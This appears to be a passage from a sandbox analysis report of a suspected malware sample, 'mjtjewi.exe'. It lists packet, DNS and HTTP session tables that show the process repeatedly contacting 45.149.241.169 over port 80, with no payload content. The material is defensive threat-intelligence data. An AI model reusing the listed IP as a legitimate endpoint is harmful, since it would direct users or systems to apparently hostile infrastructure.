Oct 3, 2024 09:22:41.558182955 CEST | 64446 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:41.564050913 CEST | 80 | 64446 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.187657118 CEST | 80 | 64446 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.187695980 CEST | 80 | 64446 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.187829971 CEST | 64446 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.187880039 CEST | 64446 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.192689896 CEST | 80 | 64446 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.331733942 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.336947918 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.337194920 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.339214087 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.344338894 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:42.344415903 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:42.349287987 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.088213921 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.088359118 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.088517904 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.088592052 CEST | 64447 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.095305920 CEST | 80 | 64447 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.237551928 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.242518902 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.243807077 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.246021032 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.251410961 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.251789093 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.256630898 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.910703897 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.910820007 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:43.911035061 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.911103010 CEST | 64448 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:43.915997982 CEST | 80 | 64448 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.055253029 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.060436010 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.060545921 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.062635899 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.067401886 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.067473888 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.072300911 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.839922905 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.840137959 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.840225935 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:22:44.840279102 CEST | 64449 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:22:44.845007896 CEST | 80 | 64449 | 45.149.241.169 | 192.168.2.11 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 3, 2024 09:20:40.500483990 CEST | 55019 | 53 | 192.168.2.11 | 1.1.1.1 |
Oct 3, 2024 09:20:40.665950060 CEST | 53 | 55019 | 1.1.1.1 | 192.168.2.11 |
Oct 3, 2024 09:20:48.098545074 CEST | 59057 | 53 | 192.168.2.11 | 1.1.1.1 |
Oct 3, 2024 09:20:48.111200094 CEST | 53 | 59057 | 1.1.1.1 | 192.168.2.11 |
Oct 3, 2024 09:20:57.588593006 CEST | 53 | 53442 | 1.1.1.1 | 192.168.2.11 |
Oct 3, 2024 09:20:59.065795898 CEST | 53 | 49505 | 1.1.1.1 | 192.168.2.11 |
Oct 3, 2024 09:21:47.463262081 CEST | 49886 | 53 | 192.168.2.11 | 1.1.1.1 |
Oct 3, 2024 09:21:47.474385977 CEST | 53 | 49886 | 1.1.1.1 | 192.168.2.11 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 3, 2024 09:20:40.500483990 CEST | 192.168.2.11 | 1.1.1.1 | 0x381 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 3, 2024 09:20:48.098545074 CEST | 192.168.2.11 | 1.1.1.1 | 0x2040 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 3, 2024 09:21:47.463262081 CEST | 192.168.2.11 | 1.1.1.1 | 0xa4ac | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 3, 2024 09:20:40.665950060 CEST | 1.1.1.1 | 192.168.2.11 | 0x381 | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Oct 3, 2024 09:20:40.665950060 CEST | 1.1.1.1 | 192.168.2.11 | 0x381 | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false | ||
Oct 3, 2024 09:20:48.111200094 CEST | 1.1.1.1 | 192.168.2.11 | 0x2040 | No error (0) | 45.149.241.169 | A (IP address) | IN (0x0001) | false | ||
Oct 3, 2024 09:21:47.474385977 CEST | 1.1.1.1 | 192.168.2.11 | 0xa4ac | No error (0) | 45.149.241.169 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.11 | 49711 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:48.126672029 CEST | 262 | OUT | |
Oct 3, 2024 09:20:48.138102055 CEST | 176 | OUT | |
Oct 3, 2024 09:20:49.077418089 CEST | 169 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.11 | 49712 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:49.388974905 CEST | 262 | OUT | |
Oct 3, 2024 09:20:49.427131891 CEST | 176 | OUT | |
Oct 3, 2024 09:20:50.285749912 CEST | 169 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.11 | 49713 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:50.390712023 CEST | 262 | OUT | |
Oct 3, 2024 09:20:50.395967960 CEST | 149 | OUT | |
Oct 3, 2024 09:20:51.444361925 CEST | 177 | IN | |
Oct 3, 2024 09:20:51.445071936 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.11 | 49714 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:52.127427101 CEST | 262 | OUT | |
Oct 3, 2024 09:20:52.138115883 CEST | 149 | OUT | |
Oct 3, 2024 09:20:52.895509005 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.11 | 49715 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:53.054243088 CEST | 262 | OUT | |
Oct 3, 2024 09:20:53.059613943 CEST | 149 | OUT | |
Oct 3, 2024 09:20:55.154339075 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.11 | 49717 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:55.306317091 CEST | 262 | OUT | |
Oct 3, 2024 09:20:55.313220024 CEST | 149 | OUT | |
Oct 3, 2024 09:20:56.378058910 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.11 | 49718 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:56.539355040 CEST | 262 | OUT | |
Oct 3, 2024 09:20:56.544536114 CEST | 149 | OUT | |
Oct 3, 2024 09:20:57.546360970 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.11 | 55843 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:58.060252905 CEST | 262 | OUT | |
Oct 3, 2024 09:20:58.316168070 CEST | 149 | OUT | |
Oct 3, 2024 09:20:59.117296934 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.11 | 64348 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:20:59.267592907 CEST | 262 | OUT | |
Oct 3, 2024 09:20:59.272737026 CEST | 149 | OUT | |
Oct 3, 2024 09:21:00.351605892 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.11 | 64350 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:00.665224075 CEST | 262 | OUT | |
Oct 3, 2024 09:21:00.670902967 CEST | 149 | OUT | |
Oct 3, 2024 09:21:01.453564882 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.11 | 64352 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:01.618191004 CEST | 262 | OUT | |
Oct 3, 2024 09:21:01.623466969 CEST | 149 | OUT | |
Oct 3, 2024 09:21:02.292433023 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.11 | 64354 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:02.443226099 CEST | 262 | OUT | |
Oct 3, 2024 09:21:02.448704004 CEST | 149 | OUT | |
Oct 3, 2024 09:21:03.191437006 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.11 | 64355 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:03.482903957 CEST | 262 | OUT | |
Oct 3, 2024 09:21:03.488048077 CEST | 149 | OUT | |
Oct 3, 2024 09:21:04.262743950 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.11 | 64357 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:04.423429966 CEST | 262 | OUT | |
Oct 3, 2024 09:21:04.428361893 CEST | 149 | OUT | |
Oct 3, 2024 09:21:05.200607061 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.11 | 64358 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:05.354207039 CEST | 262 | OUT | |
Oct 3, 2024 09:21:05.363792896 CEST | 149 | OUT | |
Oct 3, 2024 09:21:06.209109068 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.11 | 64359 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:06.380893946 CEST | 262 | OUT | |
Oct 3, 2024 09:21:06.386274099 CEST | 149 | OUT | |
Oct 3, 2024 09:21:07.095535040 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.11 | 64360 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:07.258128881 CEST | 262 | OUT | |
Oct 3, 2024 09:21:07.265208006 CEST | 149 | OUT | |
Oct 3, 2024 09:21:08.057806969 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.11 | 64361 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:08.219978094 CEST | 262 | OUT | |
Oct 3, 2024 09:21:08.224948883 CEST | 149 | OUT | |
Oct 3, 2024 09:21:08.908827066 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.11 | 64362 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:09.167659998 CEST | 262 | OUT | |
Oct 3, 2024 09:21:09.172629118 CEST | 149 | OUT | |
Oct 3, 2024 09:21:09.839379072 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.11 | 64363 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:09.991626978 CEST | 262 | OUT | |
Oct 3, 2024 09:21:09.997520924 CEST | 149 | OUT | |
Oct 3, 2024 09:21:10.836468935 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
20 | 192.168.2.11 | 64364 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:10.991457939 CEST | 262 | OUT | |
Oct 3, 2024 09:21:10.996788025 CEST | 149 | OUT | |
Oct 3, 2024 09:21:11.917808056 CEST | 177 | IN | |
Oct 3, 2024 09:21:11.918284893 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
21 | 192.168.2.11 | 64365 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:12.107372999 CEST | 262 | OUT | |
Oct 3, 2024 09:21:12.112320900 CEST | 149 | OUT | |
Oct 3, 2024 09:21:12.880244970 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
22 | 192.168.2.11 | 64366 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:13.046875954 CEST | 262 | OUT | |
Oct 3, 2024 09:21:13.055507898 CEST | 149 | OUT | |
Oct 3, 2024 09:21:13.766148090 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
23 | 192.168.2.11 | 64367 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:13.911133051 CEST | 262 | OUT | |
Oct 3, 2024 09:21:13.916853905 CEST | 149 | OUT | |
Oct 3, 2024 09:21:14.575090885 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
24 | 192.168.2.11 | 64368 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:14.876427889 CEST | 262 | OUT | |
Oct 3, 2024 09:21:14.881237984 CEST | 149 | OUT | |
Oct 3, 2024 09:21:15.898722887 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
25 | 192.168.2.11 | 64369 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:16.055149078 CEST | 262 | OUT | |
Oct 3, 2024 09:21:16.059968948 CEST | 149 | OUT | |
Oct 3, 2024 09:21:16.915457964 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
26 | 192.168.2.11 | 64370 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:17.076250076 CEST | 262 | OUT | |
Oct 3, 2024 09:21:17.083632946 CEST | 149 | OUT | |
Oct 3, 2024 09:21:17.866369963 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
27 | 192.168.2.11 | 64371 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:18.018455029 CEST | 262 | OUT | |
Oct 3, 2024 09:21:18.023488045 CEST | 149 | OUT | |
Oct 3, 2024 09:21:19.008034945 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
28 | 192.168.2.11 | 64372 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:19.169938087 CEST | 262 | OUT | |
Oct 3, 2024 09:21:19.175709009 CEST | 149 | OUT | |
Oct 3, 2024 09:21:21.428244114 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
29 | 192.168.2.11 | 64373 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:21.587904930 CEST | 262 | OUT | |
Oct 3, 2024 09:21:21.592823982 CEST | 149 | OUT | |
Oct 3, 2024 09:21:22.234579086 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
30 | 192.168.2.11 | 64374 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:22.381572008 CEST | 262 | OUT | |
Oct 3, 2024 09:21:22.386914968 CEST | 149 | OUT | |
Oct 3, 2024 09:21:23.090107918 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
31 | 192.168.2.11 | 64375 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:23.241945982 CEST | 262 | OUT | |
Oct 3, 2024 09:21:23.246841908 CEST | 149 | OUT | |
Oct 3, 2024 09:21:23.948323011 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
32 | 192.168.2.11 | 64376 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:24.099610090 CEST | 262 | OUT | |
Oct 3, 2024 09:21:24.104473114 CEST | 149 | OUT | |
Oct 3, 2024 09:21:24.875488997 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
33 | 192.168.2.11 | 64378 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:25.024096966 CEST | 262 | OUT | |
Oct 3, 2024 09:21:25.029227972 CEST | 149 | OUT | |
Oct 3, 2024 09:21:25.669203997 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
34 | 192.168.2.11 | 64379 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:25.815433979 CEST | 262 | OUT | |
Oct 3, 2024 09:21:25.820374966 CEST | 149 | OUT | |
Oct 3, 2024 09:21:26.688807011 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
35 | 192.168.2.11 | 64380 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:26.846657991 CEST | 262 | OUT | |
Oct 3, 2024 09:21:26.851586103 CEST | 149 | OUT | |
Oct 3, 2024 09:21:27.634349108 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
36 | 192.168.2.11 | 64381 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:27.805084944 CEST | 262 | OUT | |
Oct 3, 2024 09:21:27.810226917 CEST | 149 | OUT | |
Oct 3, 2024 09:21:28.548094988 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
37 | 192.168.2.11 | 64382 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:28.692899942 CEST | 262 | OUT | |
Oct 3, 2024 09:21:28.697925091 CEST | 149 | OUT | |
Oct 3, 2024 09:21:29.432213068 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
38 | 192.168.2.11 | 64383 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:29.586962938 CEST | 262 | OUT | |
Oct 3, 2024 09:21:29.591806889 CEST | 149 | OUT | |
Oct 3, 2024 09:21:30.259722948 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
39 | 192.168.2.11 | 64384 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:30.408480883 CEST | 262 | OUT | |
Oct 3, 2024 09:21:30.413511038 CEST | 149 | OUT | |
Oct 3, 2024 09:21:31.213476896 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
40 | 192.168.2.11 | 64385 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:31.493468046 CEST | 262 | OUT | |
Oct 3, 2024 09:21:31.498785019 CEST | 149 | OUT | |
Oct 3, 2024 09:21:32.591485977 CEST | 177 | IN | |
Oct 3, 2024 09:21:32.591620922 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
41 | 192.168.2.11 | 64386 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:32.738049984 CEST | 262 | OUT | |
Oct 3, 2024 09:21:32.743030071 CEST | 149 | OUT | |
Oct 3, 2024 09:21:33.386100054 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
42 | 192.168.2.11 | 64387 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:33.551290035 CEST | 262 | OUT | |
Oct 3, 2024 09:21:33.556186914 CEST | 149 | OUT | |
Oct 3, 2024 09:21:35.070835114 CEST | 177 | IN | |
Oct 3, 2024 09:21:35.071057081 CEST | 177 | IN | |
Oct 3, 2024 09:21:35.071317911 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
43 | 192.168.2.11 | 64388 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:35.234649897 CEST | 262 | OUT | |
Oct 3, 2024 09:21:35.239656925 CEST | 149 | OUT | |
Oct 3, 2024 09:21:46.491751909 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
44 | 192.168.2.11 | 64389 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:46.642540932 CEST | 262 | OUT | |
Oct 3, 2024 09:21:46.647500992 CEST | 149 | OUT | |
Oct 3, 2024 09:21:47.323739052 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
45 | 192.168.2.11 | 64390 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:47.482239008 CEST | 262 | OUT | |
Oct 3, 2024 09:21:47.487101078 CEST | 149 | OUT | |
Oct 3, 2024 09:21:48.280944109 CEST | 177 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
46 | 192.168.2.11 | 64391 | 45.149.241.169 | 80 | 1392 | C:\Users\user\Desktop\mjtjewi.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 3, 2024 09:21:48.435915947 CEST | 262 | OUT | |
Oct 3, 2024 09:21:48.440835953 CEST | 149 | OUT | |
